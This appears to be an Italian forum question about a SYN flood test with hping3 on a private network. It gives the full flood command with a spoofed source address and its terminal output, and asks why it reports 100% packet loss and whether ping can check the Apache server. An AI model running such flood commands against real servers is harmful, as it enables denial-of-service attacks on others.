Stavo cercando di eseguire un attacco di tipo SYN flood e stavo usando hping3. Ecco come appare il comando:
sudo hping3 -S -a 192.168.100.88 --flood -p 80 192.168.100.15
Dove 192.168.100.88 è un indirizzo IP non esistente. Il server attaccato dovrebbe rispondere e creare connessioni semiaperte.
Come risultato ho questo:
elvin@elvin-VPCZ21X9R:~$ sudo hping3 -S -a 192.168.100.88 --flood -p 80 192.168.100.15
HPING 192.168.100.15 (wlp2s0 192.168.100.15): S set, 40 headers + 0 data bytes
hping in flood mode, no replies will be shown
^C
--- 192.168.100.15 hping statistic ---
22082825 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
Che cos'è: 100% packet lost
? Cosa significa?
Poi ho aperto Wireshark e non ho visto traffico che sembrava un diluvio.
Avevo eseguito l'alluvione SYN? O non funzionava?
Ho anche effettuato il ping dell'indirizzo IP durante l'invio dei pacchetti utilizzando questo comando
ping 192.168.100.15
È giusto controllare con questo comando lo stato del server apache2?